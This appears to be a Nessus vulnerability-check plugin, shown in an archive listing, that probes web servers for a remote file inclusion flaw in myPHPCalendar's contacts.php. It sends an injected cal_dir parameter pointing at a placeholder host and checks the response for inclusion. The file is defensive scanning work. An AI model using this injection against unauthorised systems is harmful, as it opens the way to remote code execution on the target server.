home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / myphpcalendar_injection.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  83 lines

  1. #
  2. # (C) Tenable Network Security
  3. #
  4. # Ref:
  5. #  From: "Frog Man" <leseulfrog@hotmail.com>
  6. #  To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com
  7. #  Subject: [VulnWatch] myPHPCalendar : Informations Disclosure, File Include
  8.  
  9.  
  10.  
  11. if(description)
  12. {
  13.  script_id(11877);
  14.  script_version ("$Revision: 1.5 $");
  15.  name["english"] = "myPHPcalendar injection";
  16.  
  17.  script_name(english:name["english"]);
  18.  
  19.  desc["english"] = "
  20. It is possible to make the remote host include php files hosted
  21. on a third party server using myphpcalendar.
  22.  
  23. An attacker may use this flaw to inject arbitrary code in the remote
  24. host and gain a shell with the privileges of the web server.
  25.  
  26. Solution : Disable this CGI suite
  27. Risk factor : High";
  28.  
  29.  
  30.  
  31.  
  32.  script_description(english:desc["english"]);
  33.  
  34.  summary["english"] = "Checks for the presence of contacts.php";
  35.  
  36.  script_summary(english:summary["english"]);
  37.  
  38.  script_category(ACT_ATTACK);
  39.  
  40.  
  41.  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
  42.  family["english"] = "CGI abuses";
  43.  family["francais"] = "Abus de CGI";
  44.  script_family(english:family["english"], francais:family["francais"]);
  45.  script_dependencie("find_service.nes", "http_version.nasl");
  46.  script_require_ports("Services/www", 80);
  47.  exit(0);
  48. }
  49.  
  50. #
  51. # The script code starts here
  52. #
  53.  
  54. include("http_func.inc");
  55. include("http_keepalive.inc");
  56.  
  57. port = get_http_port(default:80);
  58.  
  59. if(!get_port_state(port))exit(0);
  60. if(!can_host_php(port:port))exit(0);
  61.  
  62. if(http_is_dead(port:port))exit(0);
  63.  
  64. function check(url)
  65. {
  66. req = http_get(item:string(url, "/contacts.php?cal_dir=http://xxxxxxxx/"),
  67.          port:port);
  68. r = http_keepalive_send_recv(port:port, data:req);
  69. if ( r == NULL ) exit(0);
  70.  if(egrep(pattern:"http://xxxxxxxx/vars\.inc", string:r))
  71.      {
  72.      security_hole(port);
  73.     exit(0);
  74.     }
  75.  
  76. }
  77.  
  78. check(url:"");
  79. foreach dir (cgi_dirs())
  80. {
  81.  check(url:dir);
  82. }
  83.